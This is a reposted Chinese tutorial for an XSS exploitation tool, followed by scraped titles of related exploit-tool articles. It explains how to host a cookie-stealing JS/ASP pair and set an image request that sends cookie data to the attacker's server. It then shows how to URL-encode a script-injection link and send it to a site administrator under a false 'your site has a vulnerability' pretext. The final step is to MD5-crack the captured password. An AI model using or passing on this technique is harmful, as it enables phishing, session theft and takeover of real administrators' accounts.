牛B装备 XSS 漏洞利用工具[使用教程]
牛B装备 XSS 漏洞利用工具[使用教程]
牛B装备 XSS 漏洞利用工具[使用教程]
作者:佚名 来源:本站整理 发布时间:2010-05-02 23:42:50 没人爱的猪 DJlyr
工具下载地址:http://www.7747.net/Soft/200912/16400.html
图片:
在工具中,最让人头疼的就是盗取cookie这个版面.绝对有许多人不知道怎么用.
现在就说一下流程吧.
把生成出来的JS和ASP文件放入空间的根目录中,如果你放的不是根目录,那么就需要修改JS文件.把
img.src = "http://www.7747.net/g.asp?key="+str; (把红色部分修改掉,在后面添加上自己的路径.)
然后找到JS的地址,如[http://www.7747.net/g.js]
<a href=跨站漏洞地址<script src=http://127.0.0.1/g.js>管理员您好,您的网站有漏洞</a>
在此是我们就把 <script src=http://127.0.0.1/g.js> 进行URL加密.
<a href=跨站漏洞地址%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%67%2E%6A%73%3E>管理员您好,您的网站有漏洞</a>
最后把这个盗取连接发送给管理员,只要他点击.那么COOKIE就会自己保存到ASP文件夹中设置的.COOKIE.TXT(程序默认)的文本文件中.
打开保存有管理员 帐号 密码 的COOKIE 密码在进行MD5解密就可以了.
原文地址:http://www.zzfhw.com/wenzhang/html/fangheishow-18559.html
转载于:https://www.cnblogs.com/fdsajhg30000/archive/2011/02/14/1954200.html
牛B装备 XSS 漏洞利用工具[使用教程]相关推荐
- xss漏洞利用方式总结
目录 搭建XSS平台 窃取cookie 抓取屏幕截图 重定向 植入广告 恶意链接 获取键盘记录 网页钓鱼 网页挂马 搭建XSS平台 首先,我们需要一个XSS平台,自己搭建一个还是使用在线的都可以,本人 ...
- 7. Vulnerability exploitation tools (漏洞利用工具 11个)
Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...
- ASP.net 资源请求漏洞利用工具PadBuster
ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...
- S2-045漏洞利用工具解决方案
S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...
- WPS漏洞利用工具Bully常见命令集合
WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.
- WebDAV服务漏洞利用工具DAVTest
WebDAV服务漏洞利用工具DAVTest WebDAV是基于Web服务的扩展服务.它允许用户像操作本地文件一样,操作服务器上的文件.借助该功能,用户很方便的在网络上存储自己的文件.为了方便用户使用, ...
- Sundown EK:漏洞利用工具中的抄袭大师
简介 Sundown是目前市场上最新款的漏洞利用工具,而Sundown的作者也成功地证明了自己其实就是一个抄袭大师.不知道这种"借鸡生蛋"的事情被曝光之后,还有用户会买他的单吗? ...
- 不能执行已释放 script 的代码_[漏洞预警]CVE20190708远程桌面代码执行漏洞利用工具已放出...
漏洞描述 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了许多版本的Windows操作系统.该漏洞在不需身份认证的情况下即可远程触发,危害与影 ...
- expsky.php,Typecho漏洞利用工具首发,半分钟完成渗透
原标题:Typecho漏洞利用工具首发,半分钟完成渗透 *本文原创作者:expsky,本文属FreeBuf原创奖励计划,未经许可禁止转载 声明:本工具由expsky原创,仅用于技术研究,不恰当使用会对 ...
- s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...
最新文章
- Spring Boot 3.0 M1 发布,正式弃用 Java 8,最低要求 Java 17。。。
- 多线程Java服务器简单实现
- java运行机制是什么_JAVA运行机制
- NSDate根据日期获得当前是周几,以及一年内的第几周,以及一个月内得第几周...
- 亿些模板【数论数学】
- html中表格内容居右的写法
- AMD第三季:站在金融危机对面
- windows安装yarn和tyarn
- 西安交大计算机录取分数线,2017年西安交通大学各省录取分数线
- java datasource 详解_Spring的datasource配置详解
- 这是互联网变得越来越敌对的7种方式
- springmvc+vue ssm 医院预约挂号系统#毕业设计
- 最新好看的自适应手机版软件APP下载类网站源码,游戏软件应用网站源码,自适应手机端Pbootcms模板
- 计算机竖版桌面,电脑桌面竖屏了怎么办
- 酒桌上应对(from:http://www.haozai.com/bbs/dispbbs.asp?boardID=6ID=106page=1)
- 形容词,名词记忆(三):ment, ent后缀常用词
- OPencv无损保存图片
- idc服务器维护岗位,IDC运维工程师工作内容
- 008-break语句与continue语句的使用,循环嵌套
- foxmail7.2导入地址簿